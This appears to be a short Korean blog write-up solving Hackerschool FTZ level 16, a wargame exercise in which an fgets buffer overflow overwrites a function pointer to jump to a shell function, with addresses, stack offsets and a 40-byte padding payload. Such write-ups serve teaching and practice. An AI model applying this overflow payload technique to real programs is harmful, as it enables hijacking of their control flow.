시스템/FTZ
hackerschool FTZ : level 16 풀이
pu1et
2019. 4. 2. 19:14
문제 분석
1. fgets bof
2. *call = shell
풀이
1. shell 함수 주소 확인 : 0x80484d0
readelf -s attackme | grep shell
attackme 파일의 심볼 테이블 중 shell이 들어간 문자열 출력
2. buf 주소 확인 : ebp-56
call 주소 확인 : ebp-16
0xffffffc8(%ebp) = ebp-56
0xfffffff0(%ebp) = ebp-16
3. payload = dummy(40bytes) + shell_addr
= "a"*40 + 0x80484d0